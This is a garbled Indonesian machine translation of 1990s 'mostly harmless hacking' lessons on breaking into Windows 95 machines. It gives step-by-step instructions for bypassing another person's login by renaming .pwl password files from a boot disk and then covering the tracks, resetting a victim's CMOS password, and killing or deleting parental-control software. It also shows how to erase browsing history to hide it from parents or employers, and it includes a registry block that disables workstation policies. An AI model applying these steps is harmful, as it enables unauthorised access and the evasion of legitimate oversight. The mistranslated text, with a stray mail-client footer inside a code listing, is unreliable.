dari 1981. Ini adalah sistem operasi baris perintah, yang berarti bahwa Anda mendapatkan prompt (mungkin c: \>) setelahnya
Anda mengetik perintah dan tekan tombol enter. MS-DOS sering disingkat DOS. Ini sedikit mirip dengan
Unix, dan bahkan dalam versi pertamanya itu menggabungkan ribuan baris kode Unix.
*******************************
Langkah empat: reboot. Anda akan mendapatkan layar dialog kata sandi. Anda kemudian dapat memalsukan teman Anda dengan
memasukkan
setiap kata sandi sialan yang Anda inginkan. Ini akan meminta Anda untuk memasukkan kembali untuk mengonfirmasi kata
sandi baru Anda.
Langkah lima. Teman Anda cukup pintar untuk mencurigai Anda baru saja membuat kata sandi baru, ya? Ya kamu bisa
letakkan yang lama yang dipilih teman Anda. Gunakan alat apa pun yang Anda suka - Manajer File, Explorer atau MS-DOS -
untuk mengganti nama
* .zzz kembali ke * .pwl.
Langkah enam: reboot dan biarkan teman Anda menggunakan kata sandi rahasia mereka. Itu masih berfungsi!
Pikirkan tentang itu. Jika seseorang di mana harus menyelinap di sekitar komputer Win 95 orang lain, gunakan ini
teknik, satu-satunya cara korban dapat menentukan telah ada penyusup adalah untuk memeriksa baru-baru ini
mengubah file dan menemukan bahwa file * .pwl telah berantakan
****************************
Kiat jenius jahat: Kecuali jika file msdos.sys bootkeys = 0 opsi aktif, kunci yang dapat melakukan sesuatu
selama proses boot adalah F4, F5, F6, F8, Shift + F5, Control + F5 dan Shift + F8. Main dengan mereka!
****************************
Sekarang anggaplah Anda menemukan bahwa kotak Win 95 Anda tidak merespons kunci bootup. Kamu masih bisa
masuk.

Halaman 11
Jika komputer Anda mengizinkan penggunaan kunci boot, Anda mungkin ingin menonaktifkannya agar sedikit
lebih aman. Selain itu, sangat mudah untuk menunjukkan kepada teman Anda cara menggunakan tombol boot dan kemudian
menonaktifkannya
ketika mereka mencoba mengacaukan komputer Anda, mereka akan menemukan Anda telah mengunci mereka.
Cara termudah - tetapi paling lambat - untuk menonaktifkan kunci boot adalah memilih pengaturan yang tepat saat menginstal
Win
95. Tapi kami adalah peretas, sehingga kami dapat melakukan trik cepat untuk melakukan hal yang sama. Kita akan belajar cara
mengedit
Menangkan file 95 msdos.sys, yang mengontrol urutan boot.
Cara Mudah Mengedit File Msdos.sys Anda:
Langkah nol: Cadangkan komputer Anda sepenuhnya, terutama file sistem. Pastikan Anda memiliki Windows
95 disk boot. Kami akan bermain dengan api! Jika Anda melakukan ini di komputer orang lain, mari saja
harap Anda memiliki izin untuk menghancurkan sistem operasi, atau Anda begitu baik sehingga tidak bisa
mungkin membuat kesalahan serius.
*******************************
Catatan pemula: Anda tidak punya boot disk? Malu, malu, malu! Semua orang seharusnya memiliki boot disk
komputer mereka kalau-kalau Anda atau teman Anda melakukan sesuatu yang sangat mengerikan pada file sistem Anda. Jika
kamu
belum memiliki disk booting Win 95, berikut ini cara membuatnya.
Untuk melakukan ini, Anda memerlukan disket kosong dan disk instalasi Win 95 Anda. Klik Mulai, lalu Pengaturan,
kemudian Control Panel, lalu Add / Remove Programs, kemudian Startup Disk. Dari sini ikuti saja petunjuknya.
********************************
Langkah satu: Temukan file msdos.sys. Itu ada di direktori root (biasanya C: \). Karena ini adalah file sistem tersembunyi,
cara termudah untuk menemukannya adalah dengan mengklik My Computer, klik kanan ikon untuk boot drive Anda (biasanya C
:), di kiri
klik Jelajahi, lalu gulir ke bawah bingkai sisi kanan hingga Anda menemukan file "msdos.sys."
Langkah dua: Membuat msdos.sys dapat ditulis. Untuk melakukan ini, klik kanan pada msdos.sys, lalu klik kiri "properties." Ini
menampilkan layar tempat Anda menghapus centang pada kotak "hanya baca" dan "tersembunyi". Anda sekarang telah membuat
ini
file yang dapat Anda tarik ke pengolah kata untuk diedit.
Langkah tiga: Bawa msdos.sys di Word Pad. Untuk melakukan ini, Anda pergi ke File Manager. Temukan msdos.sys lagi dan
klik itu. Kemudian klik "kaitkan" di bawah menu "file". Kemudian klik "Word Pad." Sangat penting untuk melakukannya
gunakan Word Pad dan bukan Notepad atau program pengolah kata lainnya! Kemudian klik dua kali pada msdos.sys.
Langkah empat: Kami siap mengedit. Anda akan melihat bahwa Word Pad telah muncul dengan msdos.sys dimuat. Kamu akan
lihat sesuatu yang terlihat seperti ini:
[Jalan]
WinDir = C: \ WINDOWS
WinBootDir = C: \ WINDOWS
HostWinBootDrv = C
[Pilihan]
BootGUI = 1
Jaringan = 1
;
; Baris berikut diperlukan untuk kompatibilitas dengan program lain.
; Jangan hapus mereka (MSDOS> SYS harus> 1024 byte).
; xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
; xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
.
.
.

Halaman 12
Untuk menonaktifkan tombol fungsi saat boot, langsung di bawah [Opsi] Anda harus memasukkan perintah
"BootKeys = 0."
Atau, cara lain untuk menonaktifkan kunci boot adalah dengan memasukkan perintah BootDelay = 0. Anda benar-benar dapat
mengacaukannya
hacker snoopy teman wannabe Anda dengan memasukkan kedua pernyataan dan berharap mereka tidak tahu tentang
BootDelay. Kemudian simpan msdos.sys.
Langkah lima: karena msdos.sys sangat penting untuk komputer Anda, Anda sebaiknya menulis proteksi seperti sebelumnya
sebelum diedit. Klik My Computer, lalu Explore, lalu klik ikon untuk boot drive Anda (biasanya C :),
kemudian gulir ke bawah di sisi kanan hingga Anda menemukan file "msdos.sys."
Klik pada msdos.sys, lalu klik kiri "properties." Ini membawa kembali layar itu dengan "hanya baca" dan
kotak "tersembunyi". Centang "baca saja."
Langkah enam: Anda * sedang menjalankan pemindai virus, bukan? Anda tidak pernah tahu apa yang mungkin dilakukan teman
Anda
komputer Anda saat punggung Anda dihidupkan. Ketika Anda boot berikutnya, pemindai virus Anda akan melihatnya
msdos.sys telah berubah. Ini akan mengasumsikan yang terburuk dan ingin membuat file msdos.sys Anda terlihat seperti itu
sebelum. Anda harus menghentikannya dari melakukan ini. Saya menjalankan Norton Antivirus, jadi yang harus saya lakukan
ketika virus
layar peringatan muncul untuk memberitahu itu "tidak bersalah."
Cara yang Sulit untuk Mengedit File Msdos.sys Anda (atau orang lain).
Langkah nol. Ini adalah praktik yang berguna untuk menggunakan DOS untuk menjalankan merajalela suatu hari di Win NT
LANs, Web dan
Server internet. Masukkan disk booting Win 95 di drive a:. Boot. Ini memberi Anda prompt DOS A: \.
Langkah satu: Membuat msdos.sys dapat ditulis. Berikan perintah "attrib -h -r -sc: \ msdos.sys"
(Ini mengasumsikan drive c: adalah disk booting.)
Langkah dua: beri perintah "edit msdos.sys" Ini membawa file ini ke pengolah kata.
Langkah tiga: Gunakan program edit untuk mengubah msdos.sys. Simpan itu. Keluar dari program edit.
Langkah empat: Pada prompt DOS, berikan perintah "attrib + r + h + sc: \ msdos.sys" untuk mengembalikan file msdos.sys
ke status file sistem yang tersembunyi dan hanya-baca.
Oke, sekarang kunci booting komputer Anda dinonaktifkan. Apakah ini berarti tidak ada yang bisa masuk? Maaf, ini bukan
cukup baik.
Seperti yang mungkin sudah Anda tebak dari instruksi "Cara Sulit Mengedit Msdos.sys", opsi Anda berikutnya untuk
Win 95 breakins adalah dengan menggunakan disk boot yang masuk dalam drive a: floppy.
Cara Mendobrak Kotak Win 95 Menggunakan Boot Disk
Langkah satu: matikan komputer Anda.
Langkah dua: masukkan disk boot ke drive A:.
Langkah tiga: boot.
Langkah empat: di prompt A: \, beri perintah: rename c: \ windows \ *. Pwl c: \ windows \ * .zzz.
Langkah empat: boot lagi. Anda dapat memasukkan apa pun atau tidak sama sekali pada prompt kata sandi dan masuk.
Langkah lima: Tutupi trek Anda dengan mengganti nama file kata sandi kembali menjadi seperti semula.
Halaman 13
Wow, ini terlalu mudah! Apa yang Anda lakukan jika Anda ingin menjauhkan teman iseng dari Win 95 Anda
kotak? Nah, ada satu hal lagi yang bisa Anda lakukan. Ini adalah trik umum pada LAN tempat jaringan
administrator tidak mau harus berurusan dengan orang-orang yang berkeliaran dengan komputer masing-masing. Itu
jawaban - tetapi bukan jawaban yang sangat bagus - adalah menggunakan kata sandi CMOS.
Cara Berantakan dengan CMOS # 1
Pengaturan dasar pada komputer Anda seperti berapa banyak dan apa jenis disk drive dan yang mana
digunakan untuk boot diadakan dalam chip CMOS di papan ibu. Baterai kecil menjaga chip ini selalu
berjalan sehingga setiap kali Anda menyalakan komputer kembali, ia mengingat apa drive pertama yang masuk
untuk instruksi bootup. Pada komputer rumah biasanya akan diatur untuk melihat pertama di drive A :. Jika A:
drive kosong, selanjutnya akan melihat drive C :.
Di komputer saya, jika saya ingin mengubah pengaturan CMOS saya tekan tombol hapus di bagian paling awal
urutan boot. Kemudian, karena saya telah menginstruksikan pengaturan CMOS untuk meminta kata sandi, saya harus
memberikan
itu kata sandi saya untuk mengubah apa pun.
Jika saya tidak ingin seseorang mem-boot dari drive A: dan mengacaukan file kata sandi saya, saya hanya bisa mengaturnya saja
boot dari drive C :. Atau bahkan agar hanya melakukan boot dari drive jarak jauh pada LAN.
Jadi, apakah ada cara untuk masuk ke kotak Win 95 yang tidak mau boot dari drive A:? Pastinya ya! Tapi sebelum
mencoba yang satu ini, pastikan untuk menuliskan * SEMUA * pengaturan CMOS Anda. Dan bersiaplah untuk membuat total
kecelakaan komputer Anda. Meretas CMOS bahkan lebih merusak daripada meretas file sistem.
Langkah satu: dapatkan obeng phillips, pengisap solder dan solder.
Langkah dua: buka korban Anda.
Langkah tiga: keluarkan baterai.
Langkah empat: pasang kembali baterai.
Langkah ketiga alternatif: banyak motherboard memiliki jumper 3 pin untuk mengatur ulang CMOS ke pengaturan default.
Melihat
untuk jumper yang dekat dengan baterai atau lihat manual Anda jika ada.
Misalnya, Anda mungkin menemukan perangkat tiga pin dengan pin satu dan dua dilompati. Jika Anda memindahkan jumper ke
pin dua dan tiga dan biarkan di sana selama lebih dari lima detik, itu dapat mengatur ulang CMOS. Peringatan - ini tidak akan
bekerja di semua komputer!
Langkah lima: Komputer korban Anda sekarang mudah-mudahan memiliki pengaturan default CMOS. Kembalikan semuanya ke
jalan
mereka, dengan pengecualian mengaturnya untuk terlebih dahulu memeriksa drive A: ketika boot.
*******************************
Anda dapat dipecat peringatan: Jika Anda melakukan ini salah, dan ini adalah komputer yang Anda gunakan di tempat kerja, dan
Anda harus pergi
menangis ke administrator sistem untuk membuat komputer Anda bekerja lagi, Anda sebaiknya meyakinkan
cerita. Apa pun yang Anda lakukan, jangan beri tahu sysadmin atau bos Anda bahwa "Peretas yang Bahagia membuat saya
melakukannya"!
*******************************
Langkah enam: lanjutkan dengan instruksi pembobolan disk boot drive A:.
Apakah ini terdengar terlalu berbulu? Bagaimana cara mudah mengacaukan CMOS? Ada program yang bisa Anda jalankan itu
melakukannya tanpa harus bermain dengan papan ibumu.
Cara Bercak dengan CMOS # 2

Halaman 14
Boy, saya harap Anda memutuskan untuk membaca sampai akhir GTMHH ini sebelum mengambil pistol solder ke
motherboard. Ada solusi mudah untuk masalah kata sandi CMOS. Ini adalah program yang disebut KillCMOS
yang dapat Anda unduh dari http://www.koasp.com. (Peringatan: jika saya jadi Anda, saya akan lebih dulu memeriksa situs ini
menggunakan browser Lynx, yang dapat Anda gunakan dari Linux atau akun shell Anda).
Sekarang anggaplah Anda suka menjelajahi Web tetapi kotak Win 95 Anda sudah diatur jadi semacam program pengasuh bersih
membatasi akses ke tempat-tempat yang ingin Anda kunjungi. Apakah ini berarti Anda ditakdirkan untuk hidup di Brady
Dunia keluarga? Tidak mungkin.
Ada beberapa cara untuk menghindari program-program yang menyensor situs Web apa yang Anda kunjungi.
Sekarang apa yang akan saya diskusikan bukan dengan maksud memberi makan pornografi kepada anak-anak kecil. Fakta
menyedihkan
adalah bahwa program sensor internet ini tidak memiliki cara mengevaluasi segala sesuatu di Web. Jadi yang mereka lakukan
adalah
hanya memungkinkan akses ke sejumlah situs Web yang relatif kecil. Ini membuat anak-anak menemukan banyak hal
hal-hal indah di Web.
Sebagai ibu dari empat anak, saya mengerti bagaimana orang tua yang cemas dapat melupakan apa yang anak-anak mereka temui
di
Internet. Tetapi program sensor Web ini adalah pengganti yang buruk untuk menghabiskan waktu bersama anak-anak Anda
sehingga mereka
pelajari cara menggunakan komputer secara bertanggung jawab dan menjadi peretas yang benar-benar dinamis! Um, maksudku,
menjadi
warga dunia maya yang bertanggung jawab. Selain itu, semua program ini bisa diretas dengan mudah.
Taktik pertama yang digunakan dengan program sensor Web adalah tekan control-alt-delete. Ini memunculkan daftar tugas. Jika
program sensor ada dalam daftar, matikan.
Taktik kedua adalah mengedit file autoexec.bat untuk menghapus penyebutan program sensor web. Ini membuatnya
dari dimuat di tempat pertama.
Tetapi bagaimana jika orang tua Anda (atau bos atau pasangan Anda) cukup cerdas untuk memeriksa di mana Anda telah
berselancar?
Anda harus menyingkirkan catatan memberatkan yang menunjukkan bahwa Anda telah menjelajahi Dilbert!
Sangat mudah untuk memperbaikinya dengan Netscape. Buka Netscape.ini dengan Notepad atau Word Pad. Mungkin akan ada
di
direktori C: \ Netscape \ netscape.ini. Di dekat bagian bawah Anda akan menemukan riwayat URL Anda. Hapus garis itu.
Tetapi Internet Explorer adalah browser yang sangat sulit untuk dikalahkan.
Mengedit Registry adalah satu-satunya cara (yang saya temukan, setidaknya) untuk mengalahkan fitur sensor di Internet
Penjelajah. Dan, coba tebak, itu bahkan menyembunyikan beberapa catatan riwayat penelusuran Anda di Registry. Brrrr!
***************************
Catatan pemula: Daftar! Ini adalah Valhalla dari mereka yang ingin memecahkan Windows. Siapa pun yang mengendalikan
Registri server jaringan mengontrol jaringan - sepenuhnya. Siapa pun yang mengendalikan Registry of a Win 95 atau
Kotak Win NT mengontrol komputer itu - sepenuhnya. Kemampuan untuk mengedit Registry sebanding dengan memiliki root
akses ke mesin Unix.
mereka
Cara mengedit Registry:
Langkah nol: Cadangkan semua file Anda. Siapkan boot disk berguna. Jika Anda mengacaukan Registry Anda cukup buruk
mungkin harus menginstal ulang sistem operasi Anda.
******************************
Anda bisa dipecat peringatan: Jika Anda mengedit Registry komputer di tempat kerja, jika Anda tertangkap Anda lebih baik
memiliki penjelasan yang bagus untuk sysadmin dan bos Anda. Cari tahu cara mengedit Registry LAN
server di tempat kerja dan Anda mungkin dalam masalah besar.

Halaman 15
*******************************
*******************************
Anda dapat masuk ke penjara peringatan: Berantakan dengan Registry komputer orang lain dan Anda mungkin melanggar
hukum. Dapatkan izin sebelum Anda mengacaukan dengan Komputer yang bukan milik Anda.
*******************************
Langkah satu: Temukan Registry. Ini tidak sederhana, karena teori Microsoft adalah apa yang Anda tidak tahu
menyakitimu. Jadi idenya adalah untuk menyembunyikan Registry dari tipe yang tidak mengerti. Tapi, hei, kita tidak peduli jika
kita benar-benar sampah
komputer kita, kan? Jadi kita klik Mulai, lalu Program, lalu Windows Explorer, lalu klik pada Windows
direktori dan cari file bernama "Regedit.exe."
Langkah dua: Jalankan Regedit. Klik itu. Ini memunculkan beberapa folder:
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
Apa yang kita lihat adalah dalam beberapa hal seperti file kata sandi, tetapi lebih dari ini. Itu menampung segala macam
pengaturan - bagaimana tampilan meja Anda, jalan pintas apa yang Anda gunakan, file apa yang diizinkan untuk Anda akses.
Jika
Anda terbiasa dengan Unix, Anda harus membuat revisi besar dalam cara Anda melihat izin file dan
kata sandi. Tapi, hei, ini pelajaran pemula jadi kita akan membahas bagian ini.
****************************
Kiat jenius jahat: Anda dapat menjalankan Regedit dari DOS dari disk boot. Verrrry berguna dalam situasi tertentu ...
****************************
Langkah ketiga. Masuklah ke salah satu benda HKEY ini. Mari kita periksa CURRENT_USER dengan mengklik tanda plus
di sebelah kiri itu. Bermain-main sebentar. Lihat bagaimana Regedit memberi Anda pilihan menu untuk memilih pengaturan
baru. Anda akan
segera sadari bahwa Microsoft menjaga Anda. Yang Anda lihat hanyalah gambar tanpa tahu siapa yang melihat file-file ini
DOS. Ini disebut "keamanan oleh ketidakjelasan." Ini bukan cara peretas mengedit Registry.
Langkah empat. Sekarang kita bertindak seperti peretas sejati. Kita akan meletakkan bagian dari Registry di mana kita dapat
melihat - dan
ubah - apa saja. Pertama-tama klik baris HKEY_CLASSES_ROOT untuk menyorotnya. Lalu pergi ke Registry
menuju pada bilah menu Regedit. Klik itu, lalu pilih "Ekspor File Registri." Berikan nama apa saja yang kamu inginkan,
tapi pastikan itu diakhiri dengan ".reg".
Langkah lima. Buka bagian dari Registry di Word Pad. Penting untuk menggunakan program itu alih-alih Note
Pad atau program pengolah kata lainnya. Salah satu caranya adalah dengan mengklik kanan dari Explorer. PENTING
PERINGATAN: jika Anda klik kiri di atasnya, itu akan secara otomatis mengimpornya kembali ke Registry. Jika Anda
mengacau
dengan itu dan klik kiri tidak sengaja, Anda dapat membuang waktu besar komputer Anda.
Langkah enam: Baca semua yang ingin Anda ketahui tentang keamanan Windows yang Microsoft biarkan untuk dibiarkan
kamu tahu. Hal-hal yang terlihat seperti:
[HKEY_CLASSES_ROOT \ htmlctl.PasswordCtl \ CurVer]
@ = "htmlctl.PasswordCtl.1"
[HKEY_CLASSES_ROOT \ htmlctl.PasswordCtl.1]
@ = "Objek PasswordCtl"

Halaman 16
[HKEY_CLASSES_ROOT \ htmlctl.PasswordCtl.1 \ CLSID]
@ = "{EE230860-5A5F-11CF-8B11-00AA00C00903}"
Hal-hal di dalam tanda kurung di baris terakhir ini adalah kata sandi terenkripsi yang mengendalikan akses ke suatu program atau
fitur program seperti fitur sensor bersih dari Internet Explorer. Apa yang dilakukannya dalam mengenkripsi
kata sandi saat Anda memasukkannya, lalu bandingkan dengan versi yang tidak terenkripsi pada file.
Langkah tujuh: Tidak jelas kata sandi mana yang digunakan untuk program apa. Saya katakan hapus semuanya! Tentu saja ini
berarti kata sandi Anda yang disimpan untuk masuk ke ISP Anda, misalnya, dapat hilang. Juga, Internet
Explorer akan muncul dengan peringatan bahwa "informasi konfigurasi Content Advisor tidak ada. Seseorang
mungkin telah mencoba merusaknya. "Ini akan terlihat sangat buruk bagi orang tuamu!
Juga, jika Anda membuang sistem operasi Anda dalam proses, Anda sebaiknya memiliki penjelasan yang baik untuk Ibu Anda
dan Ayah tentang mengapa komputer Anda sangat sakit. Sebaiknya ketahui cara menggunakan disk boot untuk menginstal ulang
Menangkan 95, ini tidak berhasil.
Langkah delapan (opsional): Ingin menghapus catatan selancar Anda? Untuk Internet Exporer, Anda harus mengedit
HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE dan HKEY_USERS. Anda juga dapat menghapus file
c: \ windows \ cookies \ mm2048.dat dan c: \ windows \ cookies \ mm256.dat. Ini juga menyimpan data URL.
Langkah sembilan. Impor file .reg Anda kembali ke percobaan Regis. Klik pada file .reg Anda di Explorer atau gunakan lainnya
fitur "Impor" di sebelah "Ekspor" yang baru saja Anda gunakan di Regedit. Ini hanya berfungsi jika Anda ingat
beri nama mereka dengan ekstensi .reg.
Langkah sembilan: Oh, tidak, Internet Explorer membuat suara menjengkelkan keras ini pertama kali saya menjalankannya dan
memasang a
merah terang "X" dengan pesan bahwa saya mengutak-atik fitur net nanny! Orang tua saya akan dengan serius membunuh
saya!
Atau, lebih buruk lagi, oh, tidak, saya menghancurkan komputer saya!
Semua tidak hilang. Hapus Registry dan cadangannya. Ini ada dalam empat file: system.dat, user.dat, dan mereka
backup, system.da0 dan user.da0. Sistem operasi Anda akan segera bunuh diri. (Ini adalah
benar-benar tes yang menarik, teman-teman, tapi saya tahu adrenalin itu!) Jika Anda kedinginan, Recycle bin masih berfungsi
setelah
Membuang file Registry Anda, sehingga Anda dapat memulihkannya dan komputer Anda akan kembali ke kekacauan yang baru
saja Anda lakukan
terbuat dari itu. Tetapi jika Anda benar-benar punya nyali, bunuh saja file-file itu dan matikan.
Kemudian gunakan disk booting Win 95 Anda untuk menghidupkan kembali komputer Anda. Instal ulang Windows 95. Jika
meja Anda paling atas
terlihat berbeda, dengan bangga memberi tahu semua orang bahwa Anda telah belajar banyak tentang Win 95 dan memutuskan
untuk berlatih
tentang bagaimana bagian atas meja Anda terlihat. Berharap mereka tidak memeriksa Internet Explorer untuk melihat apakah
program sensor masih
diaktifkan.
Dan jika orang tua Anda menangkap Anda sedang menjelajahi situs instruksi bahan peledak Nazi, atau jika Anda menangkap
anak-anak Anda di bianca's
Smut Shack, jangan salahkan itu pada Happy Hacker. Menyalahkan pada keamanan Microsoft - atau pada orang tua yang terlalu
sibuk
untuk mengajar anak-anak mereka benar dan salah.
Jadi mengapa, alih-alih meminta Anda mengedit Registry, saya tidak hanya meminta Anda untuk menghapus keempat file dan
menginstal ulang
Menangkan 95? Itu karena jika Anda bahkan setengah serius tentang peretasan, Anda perlu belajar cara mengedit
Registri komputer Win NT. Anda baru saja merasakan bagaimana rasanya di sini, dilakukan dengan aman
komputer di rumah Anda.
Anda juga mungkin telah merasakan betapa mudahnya membuat kekacauan besar ketika mengacaukan Registry.
Sekarang Anda tidak harus mengambil pekerjaan saya untuk itu, Anda tahu sendiri betapa buruknya peretas yang ceroboh
saat mengacaukan sistem komputer orang lain.

Halaman 17
Jadi apa intinya pada keamanan Windows 95? Apakah ada cara untuk mengatur kotak Win 95 sehingga tidak ada yang bisa
membobolnya? Hei, bagaimana dengan kunci kecil di komputer Anda? Maaf, itu juga tidak akan banyak gunanya. Nya
mudah diputuskan sehingga Anda masih bisa mem-boot kotak itu. Maaf, Win 95 sangat rentan.
Bahkan, jika Anda memiliki akses fisik ke komputer * ANY *, satu-satunya cara untuk mencegah Anda membobolnya adalah
dengan
mengenkripsi file-nya dengan algoritma enkripsi yang kuat. Tidak masalah komputer jenis apa itu, file apa pun
komputer dapat dengan satu atau lain cara dibaca oleh seseorang dengan akses fisik ke sana - kecuali mereka
dienkripsi dengan algoritma yang kuat seperti RSA.
Kami belum membahas semua cara untuk masuk ke kotak Win 95 dari jarak jauh, tetapi ada banyak cara. Apa saja
Kotak Win 95 pada jaringan rentan, kecuali jika Anda mengenkripsi informasinya.
Dan cara untuk menghindari program sensor Web sangat banyak, satu-satunya cara agar mereka berfungsi adalah
baik berharap anak-anak Anda tetap bodoh, atau mereka akan secara sukarela memilih untuk mengisi pikiran mereka dengan
yang berharga
bahan. Maaf, tidak ada pengganti teknologi untuk membesarkan anak-anak Anda untuk mengetahui yang benar dan yang salah.
******************************
Kiat Genius Jahat: Ingin membuang sebagian besar kebijakan yang dapat dijalankan pada workstation yang menjalankan
Windows 95?
Rekatkan ini ke lokasi yang sesuai di dalam Registri. Peringatan: hasil dapat bervariasi dan Anda mungkin masuk
semua jenis masalah apakah Anda berhasil atau tidak berhasil.
[HKEY_LOCAL_MACHINE \ Network \ Logon]
[HKEY_LOCAL_MACHINE \ Network \ Logon]
"MustBeValidated" = dword: 00000000
"username" = "ByteMe"
"UserProfiles" = dword: 00000000
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Kebijakan]
"DisablePwdCaching" = dword: 00000000
"HideSharePwds" = dword: 00000000
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer]
"NoDrives" = dword: 00000000
"NoClose" = dword: 00000000
"NoDesktop" = dword: 00000000
"NoFind" = dword: 00000000
"NoNetHood" = dword: 00000000
"NoRun" = dword: 00000000
"NoSaveSettings" = dword: 00000000
"NoRun" = dword: 00000000
"NoSaveSettings" = dword: 00000000
"NoSetFolders" = dword: 00000000
"NoSetTaskbar" = dword: 00000000
"NoAddPrinter" = dword: 00000000
"NoDeletePrinter" = dword: 00000000
"NoPrinterTabs" = dword: 00000000
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Kebijakan \ Jaringan]
"NoNetSetup" = dword: 00000000
"NoNetSetupIDPage" = dword: 00000000
"NoNetSetupSecurityPage" = dword: 00000000
Halaman 18
"NoEntireNetwork" = dword: 00000000
"NoFileSharingControl" = dword: 00000000
"NoPrintSharingControl" = dword: 00000000
"NoWorkgroupContents" = dword: 00000000
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Kebijakan \ Sistem]
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Kebijakan \ Sistem]
"NoAdminPage" = dword: 00000000
"NoConfigPage" = dword: 00000000
"NoDevMgrPage" = dword: 00000000
"NoDispAppearancePage" = dword: 00000000
"NoDispBackgroundPage" = dword: 00000000
"NoDispCPL" = dword: 00000000
"NoDispScrSavPage" = dword: 00000000
"NoDispSettingsPage" = dword: 00000000
"NoFileSysPage" = dword: 00000000
"NoProfilePage" = dword: 00000000
"NoPwdPage" = dword: 00000000
"NoSecCPL" = dword: 00000000
"NoVirtMemPage" = dword: 00000000
"DisableRegistryTools" = dword: 00000000
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Kebijakan \ WinOldApp
[AKHIR teks pesan]
[Sudah di akhir pesan]
PINE 3.91 PESAN TEKS
Folder: INBOX Pesan 178 dari 433 END
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Kebijakan \ WinOldApp
]
"Disabled" = dword: 00000000
"NoRealMode" = dword: 00000000
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Seri Pemula # 2, Bagian 3.
Peretasan dari Windows 3.x, 95 dan NT
____________________________________________________________
Pelajaran ini akan memberi tahu Anda bagaimana, dipersenjatai dengan bahkan layanan on-line paling lamban seperti America
Online dan
Sistem operasi Windows 95, Anda dapat melakukan peretasan internet yang cukup serius - hari ini!
Dalam pelajaran ini kita akan belajar cara:
· Gunakan perintah rahasia Windows 95 DOS untuk melacak dan port surfing komputer yang digunakan oleh online terkenal
penyedia jasa.
· Telnet ke komputer yang memungkinkan Anda menggunakan alat peretas whois, nslookup, dan menggali yang tak ternilai.
· Unduh alat peretas seperti pemindai porta dan cracker kata sandi yang dirancang untuk digunakan dengan Windows.

Halaman 19
· Gunakan Internet Explorer untuk menghindari pembatasan pada program apa yang dapat Anda jalankan di sekolah atau kantor
Anda
komputer.
Ya, saya dapat mendengar jericho dan Rogue Agent dan semua peretas Super Duper lainnya dalam daftar ini tertawa. saya akan
bertaruh
sudah mereka berhenti membaca ini dan dengan marah mengirim saya email api dan membuat saya marah pada 2600
pertemuan. Peretasan Windows? Pooh!
Beri tahu peretas berpengalaman bahwa Anda menggunakan Windows dan mereka akan menertawakan Anda. Mereka akan
menyuruhmu pergi dan
jangan kembali sampai Anda dipersenjatai dengan akun shell atau semacam Unix di PC Anda. Sebenarnya sudah
sudah lama berbagi pendapat. Tembak, sebagian besar waktu peretasan dari Windoze seperti menggunakan Volkswagon 1969
untuk
berpacu dengan dragster menggunakan salah satu bahan bakar berteknologi tinggi VP Racing.
Tapi sebenarnya ada alasan bagus untuk belajar meretas dari Windows. Beberapa alat terbaik Anda untuk menyelidik dan
memanipulasi jaringan Windows hanya ditemukan di Windows NT. Selanjutnya, dengan Win 95 Anda bisa
berlatih peretasan Registry yang merupakan pusat untuk bekerja kehendak Anda di server Win NT dan jaringan mereka
mengelola.
Bahkan, jika Anda ingin menjadi peretas serius, Anda akhirnya harus belajar Windows. Hal ini karena
Windows NT dengan cepat mengambil alih Internet dari Unix. Laporan IDC memproyeksikan bahwa Web berbasis Unix
pangsa pasar server akan turun dari 65% tahun 1995 menjadi hanya 25% pada tahun 2000. Pangsa Windows NT adalah
diproyeksikan tumbuh menjadi 32%. Masa depan yang lemah untuk server Web Unix ini diperkuat oleh pelaporan laporan IDC
bahwa pangsa pasar dari semua sistem Unix sekarang jatuh pada tingkat tahunan gabungan dari -17% untuk
masa mendatang, sementara Windows NT tumbuh dalam pangsa pasar sebesar 20% per tahun. (Mark Winther, "The
Pasar Global untuk Perangkat Lunak Server Internet Publik dan Swasta, "IDC # 11202, April 1996, 10, 11.)
Jadi, jika Anda ingin terus meningkatkan keterampilan meretas, Anda harus bijak dengan Windows. Salah satu dari ini
hari-hari kita akan mencibir semua peretas yang hanya menggunakan Unix.
Selain itu, bahkan Windows 95 yang menyedihkan dan menyedihkan sekarang dapat memanfaatkan banyak alat peretas gratis
yang memberikannya
banyak kekuatan Unix.
Karena ini adalah pelajaran pemula, kita akan langsung menuju ke Pertanyaan Besar: "Yang saya dapatkan adalah AOL dan
kotak Win 95.
Masih bisakah saya belajar cara meretas? "
Ya ya ya!
Rahasia untuk meretas dari AOL / Win 95 - atau dari layanan on-line yang memberi Anda akses ke Dunia
Wide Web - disembunyikan di Win 95's MS-DOS (DOS 7.0).
DOS 7.0 menawarkan beberapa alat Internet, tidak ada yang didokumentasikan dalam Windows standar atau DOS
fitur bantuan. Tetapi Anda mendapatkan kesempatan untuk mempelajari fitur-fitur tersembunyi ini hari ini.
Jadi, untuk memulai pelajaran hari ini, gunakan AOL atau layanan online lumpuh apa pun yang mungkin Anda miliki dan
lakukan
jenis koneksi yang Anda gunakan untuk mendapatkan di Web (ini akan menjadi koneksi PPP atau SLIP). Kemudian minimalkan
Peramban web dan bersiaplah untuk meretas! Selanjutnya, buka jendela DOS Anda dengan mengklik Mulai, lalu Program, lalu
MS-DOS.
Untuk peretasan terbaik, saya merasa lebih mudah menggunakan DOS di jendela dengan bilah tugas yang memungkinkan saya
untuk memotong dan
rekatkan perintah dan mudah beralih antara program Windows dan DOS. Jika DOS Anda muncul secara penuh
layar, tahan tombol Alt sambil menekan enter, dan itu akan masuk ke jendela. Lalu jika Anda melewatkan
bilah tugas, klik menu sistem di sebelah kiri judul jendela DOS dan pilih Bilah Alat.
